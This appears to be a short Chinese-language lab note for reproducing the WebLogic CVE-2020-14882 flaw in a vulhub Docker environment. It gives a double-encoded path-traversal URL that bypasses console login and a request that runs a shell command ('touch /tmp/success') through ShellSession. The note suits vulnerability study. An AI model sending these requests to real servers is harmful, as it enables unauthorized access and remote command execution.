1.环境搭建
cd vulhub-master/weblogic/CVE-2020-14882
docker-compose up -d
2.登录后台
使用以下url绕过登录认证
主页 - base_domain - WLS 控制台http://47.121.211.205:7001/console/css/%252e%252e%252fconsole.portal
3.在目标服务器创建文件
http://47.121.211.205:7001/console/css/%252e%252e%252fconsole.portal? _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runti me.getRuntime().exec('touch%20/tmp/success');")
然后进入容器 查看创建的文件